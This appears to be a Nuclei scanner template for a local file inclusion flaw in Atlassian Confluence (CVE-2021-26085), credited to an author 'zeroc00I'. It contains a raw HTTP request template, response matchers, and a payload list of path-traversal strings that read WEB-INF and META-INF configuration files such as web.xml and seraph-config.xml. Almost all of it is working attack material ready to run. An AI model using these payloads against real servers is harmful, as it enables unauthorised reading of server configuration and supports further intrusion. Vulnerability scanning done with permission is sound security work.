Ideas from: https://github.com/ColdFusionX/CVE-2021-26085
Modifications from: my burp
id: confluence-lfi-fuzz
info:
name: confluence-lfi-zeroc00I
author: zeroc00I
severity: high
reference: lfi
tags: lfi
attack: clusterbomb
requests:
- payloads:
path: confluence-lfi.txt
raw:
- |
GET /{{path}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: or
matchers:
- type: word
words:
- "groupId>org.springframework"
part: body
- type: word
words:
- "Generated by Maven"
part: body
- type: word
words:
- "security-config"
part: body
- type: word
words:
- 'com.atlassian.confluence.setup'
s/123cfx/_/;/WEB-INF/web.xml
s/123cfx/_/;/WEB-INF/classes/seraph-config.xml
s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties
s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml